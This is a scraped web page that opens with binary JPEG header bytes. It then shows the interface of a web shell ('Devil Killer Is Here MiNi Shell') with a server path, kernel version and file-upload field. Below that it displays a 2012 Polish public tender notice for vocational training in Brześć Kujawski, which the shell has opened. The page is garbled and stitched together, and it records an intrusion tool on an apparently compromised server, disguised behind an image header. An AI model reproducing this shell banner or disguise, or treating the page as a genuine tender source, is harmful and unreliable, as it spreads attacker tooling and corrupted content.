JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120627/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120627/222600-N-2012.html

<p class="kh_header"><b>Brześć Kujawski: KOMPLEKSOWE USŁUGI SZKOLENIOWE W RAMACH PROJEKTU SYSTEMOWEGO DOBRY WYBÓR- AKTYWNOŚĆ DLA 39 OSÓB Z TERENU GMINY BRZEŚĆ KUJAWSKI FINANSOWANE Z EUROPEJSKIEGO FUNDUSZU SPOŁECZNEGO</b><br>
<b>Numer ogłoszenia: 222600 - 2012; data zamieszczenia: 27.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Brzeski Ośrodek Pomocy Społecznej w Brześciu Kujawskim , ul. Hanki Sawickiej 5, 87-880 Brześć Kujawski, woj. kujawsko-pomorskie, tel. 54 231 06 35, faks 54 231 06 83.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.brzesckujawski.pl: www.bip.brzesckujawski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> KOMPLEKSOWE USŁUGI SZKOLENIOWE W RAMACH PROJEKTU SYSTEMOWEGO DOBRY WYBÓR- AKTYWNOŚĆ DLA 39 OSÓB Z TERENU GMINY BRZEŚĆ KUJAWSKI FINANSOWANE Z EUROPEJSKIEGO FUNDUSZU SPOŁECZNEGO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie kompleksowych usług szkoleniowych, na które składają się program wsparcia i kursy zawodowe dla 39 osób, korzystających ze świadczeń pomocy społecznej, współfinansowane w ramach projektu Dobry wybór - Aktywność z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki 2007 - 2013; Priorytet VII - Promocja Aktywnej Integracji; Działanie 7.1. - Rozwój i upowszechnianie aktywnej integracji; Poddziałanie 7.1.1. - Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.Oznaczenie przedmiotu zamówienia według klasyfikacji CPV:
Główny przedmiot:80.53.00.00-8 - usługi szkolenia zawodowego;Dodatkowe przedmioty:80.57.00.00-0 - usługi szkolenia w dziedzinie rozwoju osobistego;
85.12.12.70-6 - usługi psychologiczne;80.41.12.00-0 - usługi szkół nauki jazdy;
66.51.20.00-2 - usługi ubezpieczeń od następstw nieszczęśliwych wypadków i ubezpieczeń zdrowotnych;85.14.00.00-2 - różne usługi w dziedzinie zdrowia.2.	Przedmiot zamówienia obejmuje wykonanie następujących usług:1) Programu wsparcia (bloku motywacyjnego) dla 39 osób.2) Kursów zawodowych w następujących specjalnościach:a) kurs zawodowy - profesjonalny sprzedawca dla 5 osób - kod zawodu 522301. Celem kursu jest przygotowanie uczestników do pracy w charakterze sprzedawcy oraz uzyskanie zaświadczenia o ukończeniu kursu zawodowego zgodnie z § 12 rozporządzenia Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz.U. Nr 31, poz. 216), zwanego dalej w treści SIWZ rozporządzeniem;b) kurs zawodowy - stylizacji paznokci i wizażu dla 10 osób  - kod zawodu, 514202 i 514208. Celem kursu jest przygotowanie uczestnika do pracy w charakterze stylisty paznokci, wizażysty oraz uzyskanie zaświadczenia o ukończeniu kursu zawodowego zgodnie z § 12 rozporządzenia;c)	 kurs zawodowy - magazynier z obsługą wózków widłowych dla 6 osób - kod zawodu 432103 i 834401. Celem kursu jest przygotowanie uczestników do pracy w charakterze magazyniera, zdobycie uprawnień do obsługi wózków widłowych z napędem silnikowym oraz uzyskanie zaświadczenia o ukończeniu kursu zawodowego zgodnie z § 12 rozporządzenia;d) kurs zawodowy - księgowość komputerowa dla 2 osób -kod zawodu 331301. Celem kursu jest przygotowanie uczestników do pracy w charakterze pracownika księgowości posiadającego umiejętności obsługi komputera w tym zakresie oraz uzyskanie zaświadczenia o ukończeniu kursu zawodowego zgodnie z § 12 rozporządzenia;e) kurs na przedstawiciela handlowego i prawo jazdy kat B dla 11 osób -kod zawodu 524301. Celem kursu jest przygotowanie uczestników do pracy w charakterze przedstawiciela handlowego z umiejętnością prowadzenia samochodu osobowego oraz uzyskanie zaświadczenia o ukończeniu kursu zawodowego zgodnie z § 12 rozporządzenia. Kurs na prawo jazdy kategorii B zakończy się egzaminem wewnętrznym w ośrodku szkoleniowym oraz skierowaniem i opłaceniem egzaminu w Wojewódzkim Ośrodku Ruchu Drogowego;f) kurs na prawo jazdy kat C dla 3 osób. Celem kursu jest przygotowanie uczestników do egzaminu na prawo jazdy kat. C, zakończone egzaminem wewnętrznym w ośrodku szkoleniowym oraz skierowanie i opłacenie egzaminu w Wojewódzkim Ośrodku Ruchu Drogowego. g) Kurs kucharz małej gastronomii dla 1 osoby kod zawodu 512002 Celem kursu jest przygotowanie uczestnika do pracy w charakterze kucharza małej gastronomii oraz uzyskanie zaświadczenia o ukończeniu kursu zawodowego zgodnie z § 12 rozporządzenia.
3.Wykonawca zobowiązany jest w pierwszej kolejności zrealizować program wsparcia (blok motywacyjny). Kursy zawodowe mogą się rozpocząć po zakończeniu zajęć z bloku motywacyjnego. Zakres tematyczny i minimalny wymiar godzinowy wymaganych zajęć opisany jest w Załączniku Nr 1 do SIWZ.4.Wymagany termin realizacji bloku motywacyjnego do dnia 15 września 2012 r.5.Każdy z kursów zawodowych obejmuje zajęcia teoretyczne, jak i praktyczne i kończy się egzaminem dla każdego z uczestników kursu.6.Egzamin końcowy odrębny dla każdego z kursów zawodowych składających się na przedmiot zamówienia musi być uwzględniony w wymiarze 3 godzin. W przypadku kursów na prawo jazdy sposób przeprowadzenia egzaminu określa rozporządzenie Ministra Infrastruktury z dnia 27 października 2005 r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów (Dz.U. Nr 217, poz. 1834 z późn. zm.).
7. Zakres tematyczny i minimalny wymiar godzinowy poszczególnych kursów zawodowych opisany jest w Załączniku Nr 1 do SIWZ. W przypadku kursów na prawo jazdy minimalne wymogi co do sposobu realizacji kursów określa rozporządzenie Ministra Infrastruktury z dnia 27 października 2005 r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów (Dz.U. Nr 217, poz. 1834 z późn. zm.). 8.Kursy zawodowe muszą być zrealizowane do dnia 30 listopada 2012r.9. Proponowany program zajęć, zakres tematyczny, atrakcyjność szkolenia w tym metody i formy nauczania oraz wykorzystywane narzędzia stanowiły będą element oceny ofert w kryterium jakość oferowanej usługi. 10. Blok motywacyjny wykonawca zobowiązany jest zrealizować z podziałem uczestników na trzy grupy (13+13+13). 11. Zajęcia szkoleniowe na poszczególnych kursach zawodowych odbywają się w jednej grupie niezależnie od tego czy realizowane są zajęcia praktyczne, czy teoretyczne. 12.	Szkolenia muszą się odbywać w odpowiedniej bazie szkoleniowej. Pomieszczenia przeznaczone na realizację bloku motywacyjnego, jak i na realizację kursów zawodowych, powierzchniowo oraz pod względem sprzętu i wyposażenia muszą być dostosowane do jednoczesnego przebywania i swobodnego uczestnictwa w zajęciach wszystkich osób biorących udział w danym kursie, dotyczy to również zajęć praktycznych. Wymagane jest by praktyki na wszystkich kursach odbywały się w przystosowanych pracowniach, obiektach, czy salach szkoleniowych, odpowiednio do tematyki kursu wyposażanych, pod nadzorem przedstawiciela kadry dydaktycznej odpowiedzialnego za realizację przedmiotowego elementu składowego usługi szkoleniowej. Warunki odbywania szkolenia zarówno w bloku motywacyjnym, jak i na poszczególnych kursach zawodowych muszą być zgodne z wymogami bezpieczeństwa i higieny pracy.
13.Realizacja usług szkoleniowych wymaga zagwarantowania odpowiednich narzędzi do przeprowadzenia zajęć teoretycznych, jak i praktycznych. Przez narzędzia rozumie się materiały piśmiennicze, pomoce naukowe i dydaktyczne, a także ubrania robocze, sprzęt i urządzenia w zależności od rodzaju szkolenia. Proponowane formy nauczania stanowiły będą element oceny ofert w kryterium jakość oferowanej usługi. Wydawanie ww. wymaga każdorazowego żądania potwierdzenia odbioru przez uczestnika na piśmie, które to dokumenty wykonawca po zakończeniu kursów zobowiązany będzie przedłożyć zamawiającemu. 14.Pomieszczenia, jak i wszystkie materiały oraz dokumenty, związane z realizacją szkoleń muszą promować realizowany przez BOPS projekt poprzez zamieszczenie jego logotypów. Te ostatnie oraz plakaty informacyjne zamawiający przekaże wykonawcy w dniu podpisania umowy o udzielenie zamówienia. Do oznakowania pozostałych zobowiązany jest wykonawca.15.Szkolona grupa osób (39 osoby) winna posiadać, co najmniej jednego opiekuna szkolenia wyznaczonego przez wykonawcę. Zadaniem opiekuna jest sprawowanie nadzoru nad realizacją usługi i jej zgodności z warunkami zaproponowanymi w ofercie oraz obsługa administracyjna kursów, w tym wyposażenie szkolonych w niezbędne materiały, informowanie na bieżąco szkolonych, m.in. o terminach i miejscach zajęć, codzienne prowadzenie dziennika zajęć i listy obecności, przeprowadzenie dwóch ankiet: 1 na rozpoczęcie kursu oraz 2 po zakończeniu kursu, a przed egzaminem końcowym (kwestionariusze ankiet, stanowiące załączniki do umowy o udzielenie przedmiotowego zamówienia zamawiający przekaże wykonawcy w dniu podpisania umowy). Wypełnione ankiety wykonawca zobowiązany będzie przekazać zamawiającemu po zakończeniu kursów wraz ze sprawozdaniem.16.W trakcie szkoleń wykonawca zapewnia codziennie (zarówno podczas bloku motywacyjnego, jak i kursów zawodowych) catering dla każdego uczestnika szkolenia w kwocie nie mniejszej niż 12 zł dziennie, na który składa się ciepły posiłek oraz stały dostęp do zimnych napojów, kawy i herbaty, za wyjątkiem kursów na prawo jazdy kat B i C w części praktycznej.17.Wykonawca zobowiązany jest zapewnić transport uczestników szkolenia do miejsca odbywania szkolenia zarówno w bloku motywacyjnym, jak i do miejsc realizacji poszczególnych kursów zawodowych:1)transport odbywa się na trasie pomiędzy siedzibą BOPS w Brześciu Kujawskim przy ul. Hanki Sawickiej 5, a miejscem odbywania szkolenia,
2)transport odbywać się musi pojazdem przeznaczonym do przewozu osób, sprawnym technicznie i ubezpieczonym,3)	wykonawca może w miejsce zapewnienia transportu we własnym zakresie, pokrywać koszty transportu środkami komunikacji zbiorowej (koszty biletów).18.Wykonawca jest zobowiązany zapewnić uczestnikom szkolenia badania lekarskie niezbędne do wykonywania określonych w poszczególnych kursach zawodów:1dla uczestników kursu magazynier z obsługą wózków widłowych (7 osób) - orzeczeń psychologicznych do wykonywania zawodu operator wózków,2) dla uczestników kursu przedstawiciel handlowy i prawo jazdy kat. B (10 osób) - badań określonych przepisami prawa, 3)	dla uczestników kursu na prawo jazdy kat. C (3 osoby) - badań określonych przepisami prawa, 4)	dla uczestnika kursu kucharz małej gastronomii (1 osoba) - badań wymaganych przez Sanepid. 19.	Czas przeprowadzenia badań nie pomniejsza czasu przeznaczonego na edukację. 20. Wykonawca zobowiązany jest zapewnić szkolonym w trakcie zajęć podstawowe leki przeciwbólowe i niezbędne środki opatrunkowe. W nagłych przypadkach wykonawca zapewnia transport do placówki medycznej. 21. Zajęcia szkoleniowe prowadzić mogą osoby wyłącznie posiadające uprawnienia do nauczania oraz posiadający odpowiednie kwalifikacje rodzajowe w określonym specyfiką przedmiotu zamówienia zawodach. Dane na temat kadry niezbędnej do realizacji niniejszego przedmiotu zamówienia znajdują się w Załączniku Nr 2 do Specyfikacji Istotnych Warunków Zamówienia. Minimalne kwalifikacje kadry dydaktycznej do realizacji kursów na prawo jazdy określa rozporządzenie Ministra Infrastruktury z dnia 27 października 2005 r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów (Dz.U. Nr 217, poz. 1834 z późn. zm.). Kwalifikacje proponowanej kadry dydaktycznej stanowiły będą element oceny ofert w kryterium jakość oferowanej usługi. 22.	Egzamin końcowy prowadzony musi być przez komisję składającą się z przewodniczącego, członków i sekretarza komisji - posiadająca odpowiednie wykształcenie zgodne z § 11 rozporządzenia.
23. W przypadku kursu na przedstawiciela handlowego z prawem jazdy kat. B i oraz kursu na prawo jazdy kat. C wykonawca zobowiązany jest przeprowadzić egzamin wewnętrzny. Skierować uczestników na egzamin w WORD. Opłacić wymagane przepisami prawa badania dla każdej z osób przystępujących do egzaminu w WORD, a także opłacić koszt jednokrotnego egzaminu. 24.	Wykonawca ubezpiecza każdego przedstawiciela potencjału kadrowego poprzez wykupienie polis OC i NNW na kwotę min. 12 tys. zł, przy czym OC na kwotę min. 5 tys. zł, chyba że osoby te są objęte ubezpieczeniem wykonawcy (formy ubezpieczenia grupowego). 25.	Wykonawca ubezpiecza uczestników szkoleń poprzez wykupienie polisy NNW na kwotę min, 10 tys. zł na każdego uczestnika. 26.Wykonawca zobowiązany jest do bieżącego informowania zamawiającego o nie zgłoszeniu się na szkolenie osoby skierowanej przez zamawiającego, o nieobecności na szkoleniu lub też o rezygnacji z uczestnictwa w szkoleniu w trakcie jego trwania - pod rygorem odmowy przez zamawiającego zapłaty za szkolenie tych osób. 27.Każda nowo skierowana na szkolenie osoba w trakcie jego trwania musi odbyć 80 % zajęć teoretycznych i 100 % zajęć praktycznych. 28.Zamawiający zastrzega sobie prawo skierowania na szkolenie mniejszej liczy osób, w przypadku braku możliwości skierowania osób dodatkowych. Zamawiający ponosi koszty za faktycznie przeszkoloną liczbę osób (blok motywacyjny + kurs zawodowy), nawet jeśli dany uczestnik uzyska negatywny wynik egzaminu końcowego. 29.Wykonawca jest zobowiązany wydać każdemu uczestnikowi kursów opisanych w rozdziale II pkt 2, który pozytywnie zdał egzamin końcowy zaświadczenie zgodnie ze wzorem, stanowiącym załącznik nr 3 do rozporządzenia Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz.U. Nr 31, poz. 216). Nie dotyczy kursów na prawo jazdy. 30.Po ukończeniu kursu, o którym mowa w rozdziale II pkt 2 lit. c - magazynier z obsługą wózków widłowych - uczestnicy powinni posiadać uprawnienia do obsługi wózka jezdniowego z napędem silnikowym zgodnie z rozporządzeniem Ministra Gospodarki z dnia 20 września 2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz.U. Nr 118, poz. 1623), potwierdzone pozytywnym wynikiem sprawdzianu, o którym mowa ww. rozporządzeniu. 31.We wszystkich kursach składających się na przedmiot zamówienia zaświadczenia wymagane innymi przepisami prawa, zaświadczenia o ukończeniu bloku motywacyjnego oraz stosowany certyfikat uczestnictwa w szkoleniach z informacją o sposobie finansowania kursu, tj. z dopiskiem: Projekt współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego. 32.Po zakończeniu szkolenia wykonawca obligatoryjnie musi dostarczyć zamawiającemu sprawozdanie - protokół z realizacji usług wraz z nw. dokumentami w ciągu 15 dni:1) Kopia protokołu egzaminacyjnego z wyszczególnieniem osób, które nie przystąpiły do egzaminu, które egzaminu nie zdały i które egzamin zdały.2) Kserokopie uzyskanych zaświadczeń lub innych dokumentów, potwierdzających ukończenie kursów. 3) Imienny wykaz osób, które nie ukończyły kursów. 4) Ankiety, o których mowa w pkt 15.33.Wykonawca zobowiązany jest do przechowywania oryginalnych dokumentów, dotyczących realizacji niniejszych szkoleń do 31.12.2020 r. 34. Wymagania określone w rozdziale II SIWZ dotyczą wszystkich kursów składających się na przedmiot zamówienia, chyba, że w poszczególnych punktach zapisano inaczej..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.57.00.00-0, 85.12.12.70-6, 66.51.20.00-2, 80.41.12.00-0, 85.14.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnianie niniejszego warunku przez wykonawcę w zakresie realizacji usług szkoleniowych dla osób bezrobotnych potwierdza:
1)	posiadanie wpisu do rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej, zgodnie z art. 20 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (Dz.U. z 2008 r. Nr 69, poz. 145 z późn. zm.).
2)	posiadanie wpisu do rejestru przedsiębiorców prowadzących ośrodek szkolenia kierowców w kat. B i C w rozumieniu art. 103 ust. 1 i 2 ustawy z dnia 20 czerwca 1997 r. - Prawo o ruchu drogowym (Dz.U. z 2005r., nr 108, poz. 908 ze zm.).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać się doświadczeniem w wykonaniu w okresie ostatnich trzech lat, a jeżeli okres działalności jest krótszy - w tym okresie, usług szkoleniowych składających się z bloku motywacyjnego (programu wsparcia) i kursów zawodowych dla co najmniej 30 osób bezrobotnych.
Wykonawca zobowiązany jest dołączyć dokumenty (np. referencje) potwierdzające przeprowadzenie usług szkoleniowych z uwzględnieniem ww. wymogów oraz, że przedmiotowe usługi zostały wykonane należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca wykaże, iż na czas realizacji zamówienia będzie dysponował:
1)	ośrodkiem szkoleniowym, wyposażonym we właściwe sale szkoleniowe dla min. 13 osób do realizacji zajęć z bloku motywacyjnego, w przypadku realizacji zajęć z modułu I dla wszystkich 3 grup w tym samym terminie dla min. 39 osób;
2)	dysponowanie wyposażoną we właściwy sprzęt salą szkoleniową dla min. 5 osób jednorazowo na miejsce zajęć teoretycznych oraz salą szkoleniową lub placówką z przeznaczeniem na miejsce zajęć praktycznych w przypadku kursu zawodowego profesjonalny sprzedawca;
3)	dysponowanie wyposażoną we właściwy sprzęt salą szkoleniową dla 10 osób z przeznaczeniem na miejsce zajęć teoretycznych oraz placówką z przeznaczeniem na miejsce zajęć praktycznych w przypadku kursu zawodowego stylizacji paznokci i wizażu;
4)	dysponowanie wyposażoną we właściwy sprzęt salą szkoleniową dla min. 6 osób jednorazowo z przeznaczeniem na miejsce zajęć teoretycznych oraz dysponowanie min. 2 stanowiskami nauki jazdy i manewrowania wózkami jezdniowymi z napędem silnikowym oraz placem manewrowym z halą do nauki jazdy na ww. wózkach. Wymagane także dysponowanie min. jednym wózkiem podnośnikowym oraz jednym wózkiem załadowczym. Wózki muszą być sprawne technicznie i dopuszczone do użytku. W przypadku kursu zawodowego magazynier z obsługą wózków widłowych.;
5)	dysponowanie wyposażoną we właściwy sprzęt salą szkoleniową dla 2 osób z przeznaczeniem na miejsce zajęć teoretycznych oraz salą szkoleniową z przeznaczeniem na miejsce zajęć praktycznych w przypadku kursu zawodowego księgowość komputerowa;
6)	dysponowanie wyposażoną we właściwy sprzęt salą szkoleniową dla 11 osób z przeznaczeniem na miejsce zajęć teoretycznych oraz salą szkoleniową z przeznaczeniem na miejsce zajęć praktycznych w przypadku kursu zawodowego przedstawiciel handlowy oraz dysponowanie wyposażoną we właściwy sprzęt salą szkoleniową dla 11 osób z przeznaczeniem na miejsce zajęć teoretycznych oraz placem manewrowym do nauki jazdy oraz odpowiednimi samochodami sprawnymi technicznie i dopuszczonymi do nauki jazdy w przypadku kursu zawodowego prawo jazdy kat B;
7)	dysponowanie wyposażoną we właściwy sprzęt salą szkoleniową dla 3 osób z przeznaczeniem na miejsce zajęć teoretycznych oraz placem manewrowym do nauki jazdy oraz odpowiednimi samochodami sprawnymi technicznie i dopuszczonymi do nauki jazdy w przypadku kursu zawodowego prawo jazdy kat C;
8)	dysponowanie wyposażoną we właściwy sprzęt salą szkoleniową dla 1 osoby z przeznaczeniem na miejsce zajęć teoretycznych oraz salą szkoleniową z przeznaczeniem na miejsce zajęć praktycznych w przypadku kursu zawodowego mała gastronomia;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi zapewnić potencjał kadrowy niezbędny do przeprowadzenia szkoleń, w osobach:
1)	psycholog lub osoba posiadająca wykształcenie wyższe magisterskie posiadająca kwalifikacje uprawniające do prowadzenia zajęć socjoterapeutycznych, do przeprowadzenia zajęć w bloku motywacyjnym,
2)	doradca zawodowy, posiadający wykształcenie wyższe magisterskie oraz uprawnienia do nauczania, do przeprowadzenia zajęć w bloku motywacyjnym,
3)	kadra dydaktyczna do realizacji zajęć teoretycznych, posiadająca wykształcenie wyższe, a w przypadku kursu prawa jazdy kat B i C oraz kursu magazyniera z obsługą wózków widłowych co najmniej średnie, uprawnienia do nauczania, oraz odpowiednie kwalifikacje w zależności od specjalności danego kursu zawodowego,
4)	kadra dydaktyczna do realizacji zajęć praktycznych musi posiadać co najmniej wykształcenie średnie, uprawnienia do nauczania w zakresie przedmiotów zawodowych oraz posiadać kwalifikacje w zależności od specjalności danego kursu zawodowego,
5)	komisja egzaminacyjna w składzie min. 3 osobowym na każdy z kursów, składających się na przedmiot zamówienia - posiadająca odpowiednie wykształcenie zgodnie z § 11 rozporządzenia, nie dotyczy kursów na prawo jazdy,
6)	opiekun grupy szkoleniowej opiekunem grupy może być osoba z katalogu osób wymienionych w ppkt od 1 do 5 lub inna osoba posiadająca minimum wykształcenie średnie zatrudniona minimum do 31.12.2012 r. na podstawie umowy o pracę u wykonawcy, potrafiąca wypełnić obowiązki administracyjne.
Potwierdzeniem spełniania warunku dysponowania osobami zdolnymi do wykonania oferowanej usługi szkoleniowej jest sporządzenie przez wykonawcę wykazu kadry uwzględniającego wymogi zamawiającego wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonywania zamówienia, a także zakresu wykonywanych przez nich czynności oraz informacją o podstawie do dysponowania tymi osobami.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
